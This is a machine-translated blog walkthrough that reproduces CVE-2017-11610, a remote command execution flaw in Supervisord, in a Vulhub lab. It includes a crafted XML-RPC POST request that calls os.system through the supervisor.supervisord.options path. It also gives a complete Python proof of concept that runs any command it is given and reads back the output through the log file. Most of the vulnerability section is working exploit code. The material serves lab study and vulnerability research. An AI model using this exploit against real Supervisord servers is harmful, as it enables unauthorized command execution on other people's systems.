当前位置:网站首页>Vulhub vulnerability recurrence 67_ Supervisor
Vulhub vulnerability recurrence 67_ Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610_ Supervisord Remote command execution vulnerability
Preface
Supervisor(http://supervisord.org/) Yes, it is Python One developed client/server service , yes Linux/Unix A process management tool under the system , I won't support it Windows System . It's easy to monitor 、 start-up 、 stop it 、 Restart one or more processes .
Reference link :
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
-https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
shooting range :192.168.4.10_ubuntu
#docker-compose build
docker-compose up -d
After the environment starts , visit `http://your-ip:9001` You can view it Supervisord The page of .
Vulnerability testing
Execute arbitrary commands directly :
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
Container view success Create success
## About direct echo POC
@Ricter An idea put forward on Weibo , Very effective , Is to write the result of the command execution to log In file , Call again Supervisord Self contained readLog Method reading log file , Read the results .
Write a simple POC: [poc.py](poc.py), Post it directly :
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
```
Use Python3 Execute and get the results :`./poc.py "http://your-ip:9001/RPC2" "command"`:
边栏推荐
- Quelques conseils communs sur l'inspecteur de l'unit é, généralement pour les extensions d'éditeur ou d'autres
- Notes, continuation, escape and other symbols
- Cuda11.1 online installation
- 驱动开发——第一个HelloDDK
- [buuctf.reverse] 159_[watevrCTF 2019]Watshell
- [NOIP2008 提高组] 笨小猴
- Select knowledge points of structure
- Nacos - TC Construction of High available seata (02)
- Principle and performance analysis of lepton lossless compression
- Simple understanding of interpreters and compilers
猜你喜欢
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
[lgr-109] Luogu may race II & windy round 6
Implementing fuzzy query with dataframe
Principle and performance analysis of lepton lossless compression
Compilation et connexion de shader dans games202 - webgl (comprendre la direction)
Zynq learning notes (3) - partial reconfiguration
【LGR-109】洛谷 5 月月赛 II & Windy Round 6
Microblogging hot search stock selection strategy
Codeforces Round #804 (Div. 2)
Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
随机推荐
Summary of three log knowledge points of MySQL
Principle and performance analysis of lepton lossless compression
Yyds dry inventory SSH Remote Connection introduction
The underlying structure of five data types in redis
RT thread analysis log system RT_ Kprintf analysis
February 12 relativelayout
Hometown 20 years later (primary school exercises)
Excel转换为Lua的配置文件
[untitled]
What are the advantages of the industry private network over the public network? What specific requirements can be met?
驱动开发——HelloWDM驱动
趋势前沿 | 达摩院语音 AI 最新技术大全
Pointer classic written test questions
Driver development - hellowdm driver
Three.js学习-光照和阴影(了解向)
Hyperledger Fabric2. Some basic concepts of X (1)
Weng Kai C language third week 3.1 punch in
Postman pre script - global variables and environment variables
注释、接续、转义等符号
Summary of redis AOF and RDB knowledge points